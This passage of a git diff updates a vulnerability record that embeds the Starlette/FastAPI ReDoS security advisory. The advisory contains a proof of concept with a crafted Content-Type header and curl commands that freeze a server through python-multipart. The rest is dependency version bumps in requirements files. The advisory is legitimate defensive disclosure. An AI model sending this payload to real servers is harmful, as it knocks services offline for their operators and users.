(Regular expression Denial of Service): https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS\n\nThis only applies when the app uses form data, parsed with `python-multipart`.\n\n### Details\n\nA regular HTTP `Content-Type` header could look like:\n\n```\nContent-Type: text/html; charset=utf-8\n```\n\n`python-multipart` parses the option with this RegEx: https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74\n\nA custom option could be made and sent to the server to break it with:\n\n```\nContent-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\n```\n\n### PoC\n\nCreate a Starlette app that uses form data. To reproduce it it's not even necessary to create a Starlette app, just using the `Request` is enough:\n\n```Python\n# main.py\nfrom starlette.requests import Request\nfrom starlette.responses import JSONResponse\n\n\nasync def app(scope, receive, send):\n assert scope[\"type\"] == \"http\"\n request = Request(scope, receive)\n data = await request.form()\n response_data = {}\n for key in data:\n print(key, data.getlist(key))\n response_data[key] = data.getlist(key)\n response = JSONResponse(response_data)\n await response(scope, receive, send)\n```\n\nThen start it with:\n\n```console\n$ uvicorn main:app\n\nINFO: Started server process [50601]\nINFO: Waiting for application startup.\nINFO: ASGI 'lifespan' protocol appears unsupported.\nINFO: Application startup complete.\nINFO: Uvicorn running on http://127.0.0.1:8000 (Press CTRL+C to quit)\n```\n\nThen send the attacking request with:\n\n```console\n$ curl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/'\n```\n\n#### Stopping it\n\nBecause that holds the main loop consuming the CPU non-stop, it's not possible to simply kill Uvicorn with `Ctrl+C` as it can't handle the signal.\n\nTo stop it, first check the process ID running Uvicorn:\n\n```console\n$ ps -fA | grep uvicorn\n\n 501 59461 24785 0 4:28PM ttys004 0:00.13 /Users/user/code/starlette/env3.10/bin/python /Users/user/code/starlette/env3.10/bin/uvicorn redos_starlette:app\n 501 59466 99935 0 4:28PM ttys010 0:00.00 grep uvicorn\n```\n\nIn this case, the process ID was `59461`, then you can kill it (forcefully, with `-9`) with:\n\n```console\n$ kill -9 59461\n```\n\n### Impact\n\nIt's a ReDoS, (Regular expression Denial of Service), it only applies to those reading form data, using `python-multipart`. This way it also affects other libraries using Starlette, like FastAPI.\n\n### Original Report\n\nThis was originally reported to FastAPI as an email to security@tiangolo.com, sent via https://huntr.com/, the original reporter is Marcello, https://github.com/byt3bl33d3r\n\n
\nOriginal report to FastAPI\n\nHey Tiangolo!\n\nMy name's Marcello and I work on the ProtectAI/Huntr Threat Research team, a few months ago we got a report (from @nicecatch2000) of a ReDoS affecting another very popular Python web framework. After some internal research, I found that FastAPI is vulnerable to the same ReDoS under certain conditions (only when it parses Form data not JSON).\n\nHere are the details: I'm using the latest version of FastAPI (0.109.0) and the following code:\n\n```Python\nfrom typing import Annotated\nfrom fastapi.responses import HTMLResponse\nfrom fastapi import FastAPI,Form\nfrom pydantic import BaseModel\n\nclass Item(BaseModel):\n username: str\n\napp = FastAPI()\n\n@app.get(\"/\", response_class=HTMLResponse)\nasync def index():\n return HTMLResponse(\"Test\", status_code=200)\n\n@app.post(\"/submit/\")\nasync def submit(username: Annotated[str, Form()]):\n return {\"username\": username}\n\n@app.post(\"/submit_json/\")\nasync def submit_json(item: Item):\n return {\"username\": item.username}\n```\n\nI'm running the above with uvicorn with the following command:\n\n```console\nuvicorn server:app\n```\n\nThen run the following cUrl command:\n\n```\ncurl -v -X 'POST' -H $'Content-Type: application/x-www-form-urlencoded; !=\\\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\' --data-binary 'input=1' 'http://localhost:8000/submit/'\n```\n\nYou'll see the server locks up, is unable to serve anymore requests and one CPU core is pegged to 100%\n\nYou can even start uvicorn with multiple workers with the --workers 4 argument and as long as you send (workers + 1) requests you'll completely DoS the FastApi server.\n\nIf you try submitting Json to the /submit_json endpoint with the malicious Content-Type header you'll see it isn't vulnerable. So this only affects FastAPI when it parses Form data.\n\nCheers\n\n#### Impact\n\nAn attacker is able to cause a DoS on a FastApi server via a malicious Content-Type header if it parses Form data.\n\n#### Occurrences\n\n[params.py L586](https://github.com/tiangolo/fastapi/blob/d74b3b25659b42233a669f032529880de8bd6c2d/fastapi/params.py#L586)\n\n
", "affected": [ { "package": { "ecosystem": "PyPI", - "name": "aiohttp", - "purl": "pkg:pypi/aiohttp" + "name": "starlette", + "purl": "pkg:pypi/starlette" }, "ranges": [ { @@ -254,316 +318,207 @@ "introduced": "0" }, { - "fixed": "3.9.2" + "fixed": "0.36.2" } ] } ], "versions": [ - "0.1", + "0.1.0", + "0.1.1", + "0.1.10", + "0.1.11", + "0.1.12", + "0.1.13", + "0.1.14", + "0.1.15", + "0.1.16", + "0.1.17", + "0.1.2", + "0.1.3", + "0.1.4", + "0.1.5", + "0.1.6", + "0.1.7", + "0.1.8", + "0.1.9", "0.10.0", "0.10.1", "0.10.2", + "0.10.3", + "0.10.4", + "0.10.5", + "0.10.6", + "0.10.7", "0.11.0", + "0.11.1", + "0.11.2", + "0.11.3", + "0.11.4", "0.12.0", + "0.12.0b1", + "0.12.0b2", + "0.12.0b3", + "0.12.1", + "0.12.10", + "0.12.11", + "0.12.12", + "0.12.13", + "0.12.2", + "0.12.3", + "0.12.4", + "0.12.5", + "0.12.6", + "0.12.7", + "0.12.8", + "0.12.9", "0.13.0", "0.13.1", + "0.13.2", + "0.13.3", + "0.13.4", + "0.13.5", + "0.13.6", + "0.13.7", + "0.13.8", "0.14.0", "0.14.1", "0.14.2", - "0.14.3", - "0.14.4", "0.15.0", - "0.15.1", - "0.15.2", - "0.15.3", "0.16.0", - "0.16.1", - "0.16.2", - "0.16.3", - "0.16.4", - "0.16.5", - "0.16.6", "0.17.0", "0.17.1", - "0.17.2", - "0.17.3", - "0.17.4", "0.18.0", - "0.18.1", - "0.18.2", - "0.18.3", - "0.18.4", "0.19.0", - "0.2", + "0.19.1", + "0.2.0", + "0.2.1", + "0.2.2", + "0.2.3", "0.20.0", "0.20.1", "0.20.2", + "0.20.3", + "0.20.4", "0.21.0", - "0.21.1", - "0.21.2", - "0.21.4", - "0.21.5", - "0.21.6", "0.22.0", - "0.22.0a0", - "0.22.0b0", - "0.22.0b1", - "0.22.0b2", - "0.22.0b3", - "0.22.0b4", - "0.22.0b5", - "0.22.0b6", - "0.22.1", - "0.22.2", - "0.22.3", - "0.22.4", - "0.22.5", - "0.3", - "0.4", + "0.23.0", + "0.23.1", + "0.24.0", + "0.25.0", + "0.26.0", + "0.26.0.post1", + "0.26.1", + "0.27.0", + "0.28.0", + "0.29.0", + "0.3.0", + "0.3.1", + "0.3.2", + "0.3.3", + "0.3.4", + "0.3.5", + "0.3.6", + "0.3.7", + "0.30.0", + "0.31.0", + "0.31.1", + "0.32.0", + "0.32.0.post1", + "0.33.0", + "0.34.0", + "0.35.0", + "0.35.1", + "0.36.0", + "0.36.1", + "0.4.0", "0.4.1", "0.4.2", - "0.4.3", - "0.4.4", "0.5.0", + "0.5.1", + "0.5.2", + "0.5.3", + "0.5.4", + "0.5.5", "0.6.0", "0.6.1", "0.6.2", "0.6.3", - "0.6.4", - "0.6.5", "0.7.0", "0.7.1", "0.7.2", "0.7.3", + "0.7.4", "0.8.0", "0.8.1", "0.8.2", "0.8.3", "0.8.4", + "0.8.5", + "0.8.6", + "0.8.7", + "0.8.8", "0.9.0", "0.9.1", + "0.9.10", + "0.9.11", "0.9.2", "0.9.3", - "1.0.0", - "1.0.1", - "1.0.2", - "1.0.3", - "1.0.5", - "1.1.0", - "1.1.1", - "1.1.2", - "1.1.3", - "1.1.4", - "1.1.5", - "1.1.6", - "1.2.0", - "1.3.0", - "1.3.1", - "1.3.2", - "1.3.3", - "1.3.4", - "1.3.5", - "2.0.0", - "2.0.0rc1", - "2.0.1", - "2.0.2", - "2.0.3", - "2.0.4", - "2.0.5", - "2.0.6", - "2.0.7", - "2.1.0", - "2.2.0", - "2.2.1", - "2.2.2", - "2.2.3", - "2.2.4", - "2.2.5", - "2.3.0", - "2.3.0a1", - "2.3.0a2", - "2.3.0a3", - "2.3.0a4", - "2.3.1", - "2.3.10", - "2.3.1a1", - "2.3.2", - "2.3.2b2", - "2.3.2b3", - "2.3.3", - "2.3.4", - "2.3.5", - "2.3.6", - "2.3.7", - "2.3.8", - "2.3.9", - "3.0.0", - "3.0.0b0", - "3.0.0b1", - "3.0.0b2", - "3.0.0b3", - "3.0.0b4", - "3.0.1", - "3.0.2", - "3.0.3", - "3.0.4", - "3.0.5", - "3.0.6", - "3.0.7", - "3.0.8", - "3.0.9", - "3.1.0", - "3.1.1", - "3.1.2", - "3.1.3", - "3.2.0", - "3.2.1", - "3.3.0", - "3.3.0a0", - "3.3.1", - "3.3.2", - "3.3.2a0", - "3.4.0", - "3.4.0a0", - "3.4.0a3", - "3.4.0b1", - "3.4.0b2", - "3.4.1", - "3.4.2", - "3.4.3", - "3.4.4", - "3.5.0", - "3.5.0a1", - "3.5.0b1", - "3.5.0b2", - "3.5.0b3", - "3.5.1", - "3.5.2", - "3.5.3", - "3.5.4", - "3.6.0", - "3.6.0a0", - "3.6.0a1", - "3.6.0a11", - "3.6.0a12", - "3.6.0a2", - "3.6.0a3", - "3.6.0a4", - "3.6.0a5", - "3.6.0a6", - "3.6.0a7", - "3.6.0a8", - "3.6.0a9", - "3.6.0b0", - "3.6.1", - "3.6.1b3", - "3.6.1b4", - "3.6.2", - "3.6.2a0", - "3.6.2a1", - "3.6.2a2", - "3.6.3", - "3.7.0", - "3.7.0b0", - "3.7.0b1", - "3.7.1", - "3.7.2", - "3.7.3", - "3.7.4", - "3.7.4.post0", - "3.8.0", - "3.8.0a7", - "3.8.0b0", - "3.8.1", - "3.8.2", - "3.8.3", - "3.8.4", - "3.8.5", - "3.8.6", - "3.9.0", - "3.9.0b0", - "3.9.0b1", - "3.9.0rc0", - "3.9.1" + "0.9.4", + "0.9.5", + "0.9.6", + "0.9.7", + "0.9.8", + "0.9.9" ], "database_specific": { - "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-8qpw-xqxj-h4r2/GHSA-8qpw-xqxj-h4r2.json" + "last_known_affected_version_range": "<= 0.36.1", + "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/02/GHSA-93gm-qmq6-w238/GHSA-93gm-qmq6-w238.json" } } ], "severity": [ { "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "references": [ { "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-8qpw-xqxj-h4r2" + "url": "https://github.com/encode/starlette/security/advisories/GHSA-93gm-qmq6-w238" }, { "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-gfw2-4jvh-wgfg" - }, - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23829" - }, - { - "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/pull/3235" - }, - { - "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/pull/8074" - }, - { - "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/pull/8074/files" + "url": "https://github.com/encode/starlette/commit/13e5c26a27f4903924624736abd6131b2da80cc5" }, { "type": "WEB", - "url": "https://github.com/aio-libs/aiohttp/commit/33ccdfb0a12690af5bb49bda2319ec0907fa7827" + "url": "https://github.com/andrew-d/python-multipart/blob/d3d16dae4b061c34fe9d3c9081d9800c49fc1f7a/multipart/multipart.py#L72-L74" }, { "type": "PACKAGE", - "url": "https://github.com/aio-libs/aiohttp" - }, - { - "type": "WEB", - "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/" + "url": "https://github.com/encode/starlette" } ], "database_specific": { "cwe_ids": [ - "CWE-444" + "CWE-400" ], "github_reviewed": true, - "github_reviewed_at": "2024-01-29T22:30:07Z", - "nvd_published_at": "2024-01-29T23:15:08Z", - "severity": "MODERATE" + "github_reviewed_at": "2024-02-05T17:01:19Z", + "nvd_published_at": null, + "severity": "HIGH" } } ], "groups": [ { "ids": [ - "GHSA-5h86-8mv2-jq9f" - ], - "aliases": [ - "CVE-2024-23334", - "GHSA-5h86-8mv2-jq9f" - ] - }, - { - "ids": [ - "GHSA-8qpw-xqxj-h4r2" + "GHSA-93gm-qmq6-w238" ], "aliases": [ - "CVE-2024-23829", - "GHSA-8qpw-xqxj-h4r2" + "GHSA-93gm-qmq6-w238" ] } ] diff --git a/requirements/awslogs-requirements.txt b/requirements/awslogs-requirements.txt index ca0fec15..9cfd40da 100644 --- a/requirements/awslogs-requirements.txt +++ b/requirements/awslogs-requirements.txt @@ -1,7 +1,7 @@ -boto3==1.28.65 -botocore==1.31.65 +boto3==1.34.34 +botocore==1.34.34 jmespath==0.10.0 python-dateutil==2.8.2 -s3transfer==0.7.0 -termcolor==2.3.0 +s3transfer==0.10.0 +termcolor==2.4.0 urllib3==2.0.7 diff --git a/requirements/azure-cli-requirements.txt b/requirements/azure-cli-requirements.txt index 2351ef01..f687f017 100644 --- a/requirements/azure-cli-requirements.txt +++ b/requirements/azure-cli-requirements.txt @@ -17,7 +17,6 @@ azure-keyvault-administration==4.4.0b2 azure-keyvault-certificates==4.7.0 azure-keyvault-keys==4.9.0b3 azure-keyvault-secrets==4.7.0 -azure-loganalytics==0.1.0 azure-mgmt-advisor==9.0.0 azure-mgmt-apimanagement==4.0.0 azure-mgmt-appconfiguration==3.0.0 @@ -33,7 +32,7 @@ azure-mgmt-cognitiveservices==13.5.0 azure-mgmt-compute==30.4.0 azure-mgmt-containerinstance==10.1.0 azure-mgmt-containerregistry==10.1.0 -azure-mgmt-containerservice==28.0.0 +azure-mgmt-containerservice==29.0.0 azure-mgmt-core==1.3.2 azure-mgmt-cosmosdb==9.4.0 azure-mgmt-databoxedge==1.0.0 @@ -46,7 +45,7 @@ azure-mgmt-eventgrid==10.2.0b2 azure-mgmt-eventhub==10.1.0 azure-mgmt-extendedlocation==1.0.0b2 azure-mgmt-hdinsight==9.0.0 -azure-mgmt-imagebuilder==1.2.0 +azure-mgmt-imagebuilder==1.3.0 azure-mgmt-iotcentral==10.0.0b1 azure-mgmt-iothub==3.0.0 azure-mgmt-iothubprovisioningservices==1.1.0 @@ -66,9 +65,9 @@ azure-mgmt-policyinsights==1.1.0b4 azure-mgmt-privatedns==1.0.0 azure-mgmt-rdbms==10.2.0b12 azure-mgmt-recoveryservices==2.5.0 -azure-mgmt-recoveryservicesbackup==7.0.0 +azure-mgmt-recoveryservicesbackup==8.0.0 azure-mgmt-redhatopenshift==1.4.0 -azure-mgmt-redis==14.2.0 +azure-mgmt-redis==14.3.0 azure-mgmt-resource==23.1.0b2 azure-mgmt-search==9.0.0 azure-mgmt-security==5.0.0 @@ -77,12 +76,13 @@ azure-mgmt-servicefabric==1.0.0 azure-mgmt-servicefabricmanagedclusters==1.0.0 azure-mgmt-servicelinker==1.2.0b1 azure-mgmt-signalr==2.0.0b1 -azure-mgmt-sql==4.0.0b13 +azure-mgmt-sql==4.0.0b15 azure-mgmt-sqlvirtualmachine==1.0.0b5 azure-mgmt-storage==21.1.0 azure-mgmt-synapse==2.1.0b5 azure-mgmt-trafficmanager==1.0.0 azure-mgmt-web==7.2.0 +azure-monitor-query==1.2.0 azure-multiapi-storage==1.2.0 azure-nspkg==3.0.2 azure-storage-common==1.4.2 @@ -97,17 +97,18 @@ chardet==5.2.0 charset-normalizer==3.3.2 colorama==0.4.6 cryptography==41.0.6 +decorator==5.1.1 distro==1.9.0 -fabric==2.4.0 +fabric==3.2.2 humanfriendly==10.0 idna==2.8 -invoke==1.2.0 +invoke==2.2.0 isodate==0.6.1 javaproperties==0.5.1 jmespath==0.9.5 jsondiff==2.0.0 knack==0.11.0 -msal==1.24.0b2 +msal==1.26.0 msal-extensions==1.0.0 msrest==0.7.1 msrestazure==0.6.4 diff --git a/requirements/conda-lock-requirements.txt b/requirements/conda-lock-requirements.txt index 53ffb7be..5625ae71 100644 --- a/requirements/conda-lock-requirements.txt +++ b/requirements/conda-lock-requirements.txt @@ -1,30 +1,30 @@ annotated-types==0.6.0 appdirs==1.4.4 -cachecontrol==0.13.1 +cachecontrol==0.14.0 cachy==0.3.0 charset-normalizer==3.3.2 click==8.1.7 click-default-group==1.2.4 clikit==0.6.2 crashtest==0.3.1 -ensureconda==1.4.3 +ensureconda==1.4.4 gitdb==4.0.11 gitpython==3.1.41 html5lib==1.1 idna==3.6 jinja2==3.1.3 -markupsafe==2.1.3 +markupsafe==2.1.5 msgpack==1.0.7 pastel==0.2.1 pkginfo==1.9.6 -pydantic==2.5.3 -pydantic-core==2.14.6 +pydantic==2.6.1 +pydantic-core==2.16.2 pylev==1.4.0 requests==2.31.0 ruamel-yaml==0.18.5 ruamel-yaml-clib==0.2.8 smmap==5.0.1 tomlkit==0.12.3 -toolz==0.12.0 +toolz==0.12.1 urllib3==1.26.18 webencodings==0.5.1 diff --git a/requirements/dolphie-requirements.txt b/requirements/dolphie-requirements.txt index 616715cb..6045dbf5 100644 --- a/requirements/dolphie-requirements.txt +++ b/requirements/dolphie-requirements.txt @@ -1,4 +1,4 @@ -linkify-it-py==2.0.2 +linkify-it-py==2.0.3 markdown-it-py==3.0.0 mdit-py-plugins==0.4.0 mdurl==0.1.2 @@ -6,6 +6,6 @@ myloginpath==0.0.4 plotext==5.2.8 pymysql==1.1.0 rich==13.7.0 -textual==0.47.1 +textual==0.48.2 textual-autocomplete==2.1.0b0 uc-micro-py==1.0.2 diff --git a/requirements/dxpy-requirements.txt b/requirements/dxpy-requirements.txt index b1693dcf..4fd8ba9c 100644 --- a/requirements/dxpy-requirements.txt +++ b/requirements/dxpy-requirements.txt @@ -1,2 +1,2 @@ -certifi==2023.11.17 +certifi==2024.2.2 urllib3==2.1.0 diff --git a/requirements/jupyterlab-requirements.txt b/requirements/jupyterlab-requirements.txt index 68280b0d..c081fa0f 100644 --- a/requirements/jupyterlab-requirements.txt +++ b/requirements/jupyterlab-requirements.txt @@ -13,8 +13,11 @@ debugpy==1.8.0 defusedxml==0.7.1 fastjsonschema==2.19.1 fqdn==1.5.1 +h11==0.14.0 hatch-jupyter-builder==0.8.3 hatch-nodejs-version==0.3.2 +httpcore==1.0.2 +httpx==0.26.0 ipykernel==6.29.0 isoduration==20.11.0 json5==0.9.14 diff --git a/requirements/linode-cli-requirements.txt b/requirements/linode-cli-requirements.txt index ff10d381..6f136480 100644 --- a/requirements/linode-cli-requirements.txt +++ b/requirements/linode-cli-requirements.txt @@ -1,9 +1,9 @@ charset-normalizer==3.3.2 idna==3.6 -linode-metadata==0.1.0 +linode-metadata==0.2.0 markdown-it-py==3.0.0 mdurl==0.1.2 openapi3==1.8.2 requests==2.31.0 rich==13.7.0 -urllib3==2.1.0 +urllib3==2.2.0 diff --git a/requirements/theharvester-requirements.txt b/requirements/theharvester-requirements.txt index bcdc0d41..9bb5c20f 100644 --- a/requirements/theharvester-requirements.txt +++ b/requirements/theharvester-requirements.txt @@ -1,22 +1,22 @@ aiodns==3.1.1 aiofiles==23.2.1 -aiohttp==3.9.1 +aiohttp==3.9.3 aiomultiprocess==0.9.0 aiosignal==1.3.1 aiosqlite==0.19.0 annotated-types==0.6.0 -anyio==3.7.1 +anyio==4.2.0 appdirs==1.4.4 attrs==23.2.0 backoff==2.2.1 -beautifulsoup4==4.12.2 -censys==2.2.10 +beautifulsoup4==4.12.3 +censys==2.2.11 charset-normalizer==3.3.2 click-plugins==1.1.1 colorama==0.4.6 deprecated==1.2.14 -dnspython==2.4.2 -fastapi==0.105.0 +dnspython==2.5.0 +fastapi==0.109.0 frozenlist==1.4.1 idna==3.6 importlib-metadata==7.0.1 @@ -24,23 +24,23 @@ importlib-resources==6.1.1 limits==3.7.0 markdown-it-py==3.0.0 mdurl==0.1.2 -multidict==6.0.4 -netaddr==0.9.0 +multidict==6.0.5 +netaddr==0.10.1 pycares==4.4.0 -pydantic==2.5.3 -pydantic-core==2.14.6 +pydantic==2.6.1 +pydantic-core==2.16.2 pyee==8.2.2 pyppeteer==1.0.2 requests==2.31.0 -requests-file==1.5.1 +requests-file==2.0.0 retrying==1.3.4 rich==13.7.0 -setuptools==69.0.2 -shodan==1.30.1 +setuptools==69.0.3 +shodan==1.31.0 slowapi==0.1.8 sniffio==1.3.0 soupsieve==2.5 -starlette==0.27.0 +starlette==0.35.1 tldextract==5.1.1 tqdm==4.66.1 ujson==5.9.0 diff --git a/requirements/vpn-slice-requirements.txt b/requirements/vpn-slice-requirements.txt index 3f45ba6d..c753662f 100644 --- a/requirements/vpn-slice-requirements.txt +++ b/requirements/vpn-slice-requirements.txt @@ -1,2 +1,2 @@ -dnspython==2.4.2 +dnspython==2.5.0 setproctitle==1.3.3